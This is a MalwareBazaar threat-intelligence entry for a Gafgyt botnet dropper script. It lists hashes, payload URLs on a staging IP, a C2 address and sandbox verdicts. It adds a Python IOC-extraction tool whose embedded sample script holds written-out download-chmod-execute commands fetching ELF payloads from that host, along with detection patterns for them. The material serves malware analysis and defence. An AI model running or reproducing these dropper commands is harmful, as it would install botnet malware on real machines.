MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Gafgyt


Vendor detections: 8



SHA256 hash: 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d
SHA3-384 hash: 1e75f23b5e05436abacff96f49b92f8c8adef49cb44ea62c3b8cebd95b1f03b464e077ff12882003bdd8c2f02eec16f3
SHA1 hash: 17d9a92918a64b4da34126a8c18adb0c55e46ebe
MD5 hash: f32e085c1f729841641fb6b0fe73fc48
humanhash: gee-quiet-pasta-louisiana
File name: bins.sh
Signature: Gafgyt
File size: 1'613 bytes
First seen: 2025-12-02 04:48:52 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:vY1EYArYC+MYgrY2YlUYOYOY1UYCY/CYCYJ:vY1EYGY5MYgrY2YSYOYOYGYCY6YCYJ
TLSH: T15C318BCB21D21C747D61D9A332ABC804B6E9A08619D95F8C7CED3CFA808DE447D44B93
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: gafgyt sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://82.22.184.67/ntpd | c5cf89081aa6911272d7515084c87c5d672dee9c86a6308083c38b2b7b6f9e47 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/sshd | c819761ed9dbbc82bc4f06a0e0433f0320bc59818b88b1076786b170e7599acb | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/openssh | b84a54d3f1b1e459d4eb0414d5d8305053c54a1b0bd6501c146d73a34b4bfe2c | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/bash | 45fba85b86e49e3afab9453838c915cd478cb0bf01161885b56204b762ace746 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/tftp | c622d8e30fa58d1cc21c02a72379e337dd8efe47a9e052fc40a0df593b1f6667 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/wget | faa6e632e8a7dcde4c0761e94f007891a29633951ba7a8dd85adfc135d6927fc | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/cron | 39f44253e84a39555f31886967b5c864a288bcd8b79a2ca2428d72dd4af3e20a | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/ftp | 38f6fa209d541ad3e042ee21d5160d51c517e983987fcdf9b8c8654fc0031618 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/pftp | 31e40894c61560ec29d23fe6a32591c82add5acbe2de7b5f23c1b81e454cc47e | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/sh | 07d061960ee63fcc7f6e5aa51227aa5f99d63255648719e8fdd5eea10d1b5a11 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/ | n/a | n/a | n/a
http://82.22.184.67/apache2 | 020864676030c25fa4ca80159cf0138e6cb2ab26711d8936d89cd3903241b067 | Gafgyt | elf gafgyt ua-wget
http://82.22.184.67/telnetd | n/a | n/a | elf ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 30
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: bash evasive lolbin

Result: Gathering data

Threat name: Linux.Downloader.Morila
Status: Malicious
First seen: 2025-12-02 04:41:03 UTC
File Type: Text (Shell)
AV detection: 24 of 36 (66.67%)
Threat level: 3/5

Malware family:
Score: 10/10
Tags: family:gafgyt botnet defense_evasion discovery linux
Behaviour:
Writes file to tmp directory
Reads system network configuration
Reads system routing table
File and Directory Permissions Modification
Executes dropped EXE
Detected Gafgyt variant
Gafgyt family
Gafgyt/Bashlite
Malware Config
C2 Extraction: 82.22.184.67:4444
Please note that we are no longer able to provide a coverage score for Virus Total.
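The URL table and the behaviour tags on this page describe the classic Gafgyt bins.sh stager: change into a writable directory, fetch one ELF per architecture over HTTP (the ua-wget tag), chmod it, run it, delete it. The script below is an added example for this entry, not the sample's own content and not MalwareBazaar or abuse.ch code. It extracts the download URLs, staging hosts and dropped file names from such a script and flags which stages of the fetch/chmod/execute/delete chain are present, which is the same evidence the "Writes file to tmp directory", "File and Directory Permissions Modification" and "Executes dropped EXE" tags summarise. SAMPLE_SCRIPT is a constructed stand-in that reuses the staging host and a few file names from the URL table; the real 1'613-byte bins.sh is not reproduced. The two tftp client spellings it recognises are an assumption, since the page only shows wget-fetched URLs.

```python
"""Pull download IOCs out of a Gafgyt-style bins.sh dropper and flag the
staging pattern described by the behaviour tags on this page.

Added example for this MalwareBazaar entry: it is not the sample's own
content and not abuse.ch/MalwareBazaar code.
"""
import re
from urllib.parse import urlparse

# Constructed stand-in, NOT the real 1'613-byte bins.sh. It follows the
# generic Gafgyt dropper pattern (cd to a writable dir, fetch, chmod, run,
# delete) and reuses the staging host and file names from the URL table.
SAMPLE_SCRIPT = r"""#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.22.184.67/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.22.184.67/sshd; chmod +x sshd; ./sshd; rm -rf sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl -O http://82.22.184.67/openssh; chmod 777 openssh; ./openssh; rm -rf openssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -g -r telnetd 82.22.184.67; chmod +x telnetd; ./telnetd; rm -rf telnetd
"""

# Stops at shell metacharacters so "wget http://h/f; chmod" yields only the URL.
URL_RE = re.compile(r"https?://[^\s;'\"|&<>()]+")
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Two common tftp client spellings (assumed; the page only shows wget fetches):
#   tftp -g -r <file> <host>        and        tftp <host> -c get <file>
TFTP_RES = (
    re.compile(r"\btftp\s+(?:-g\s+)?-r\s+(?P<file>\S+)\s+(?P<host>" + IPV4 + r")"),
    re.compile(r"\btftp\s+(?P<host>" + IPV4 + r")\s+-c\s+get\s+(?P<file>\S+)"),
)

# Each indicator maps to a behaviour listed on this page, plus the
# self-cleanup step that typically follows the launch.
INDICATORS = {
    "cd_writable_dir": re.compile(r"\bcd\s+/(?:tmp|var/run|mnt|dev/shm)\b"),  # writes file to tmp directory
    "remote_fetch": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),            # ua-wget download stage
    "chmod_dropped": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),           # permissions modification
    "exec_dropped": re.compile(r"(?:^|[;&|]\s*)\./\S+", re.M),                 # executes dropped EXE
    "self_delete": re.compile(r"\brm\s+-r?f\b"),                               # removes the payload after launch
}


def extract_urls(script: str) -> list[str]:
    """HTTP(S) download URLs in first-seen order, de-duplicated."""
    return list(dict.fromkeys(URL_RE.findall(script)))


def extract_tftp(script: str) -> list[tuple[str, str]]:
    """(host, file) pairs fetched over TFTP, in first-seen order."""
    found = []
    for rx in TFTP_RES:
        for m in rx.finditer(script):
            pair = (m.group("host"), m.group("file"))
            if pair not in found:
                found.append(pair)
    return found


def staging_hosts(script: str) -> set[str]:
    """Every host the dropper pulls payloads from (block/hunt list)."""
    hosts = {urlparse(u).hostname for u in extract_urls(script)}
    hosts.update(host for host, _ in extract_tftp(script))
    return {h for h in hosts if h}


def dropped_names(script: str) -> list[str]:
    """File names the payloads land under (what to look for in /tmp etc.)."""
    names = [urlparse(u).path.rsplit("/", 1)[-1] for u in extract_urls(script)]
    names += [f for _, f in extract_tftp(script)]
    return list(dict.fromkeys(n for n in names if n))


def dropper_indicators(script: str) -> dict:
    """Which stages of the fetch/chmod/exec/delete chain are present."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    hits["score"] = sum(1 for v in hits.values() if v)
    return hits


def summarize(script: str) -> dict:
    """One IOC record per script: hosts, URLs, tftp fetches, names, stages."""
    return {
        "hosts": sorted(staging_hosts(script)),
        "urls": extract_urls(script),
        "tftp": extract_tftp(script),
        "dropped": dropped_names(script),
        "indicators": dropper_indicators(script),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_SCRIPT), indent=2))
```

Run it against a real dropper by reading the file into summarize(); the hosts list is what to block or hunt for in proxy and DNS logs, the dropped names are what to look for in /tmp, /var/run and /mnt, and an indicator score of 5 means every stage of the chain is present.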

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: ach_202412_suspect_bash_script
Author: abuse.ch
Description: Detects suspicious Linux bash scripts

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download

Gafgyt
sh 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d (this sample)
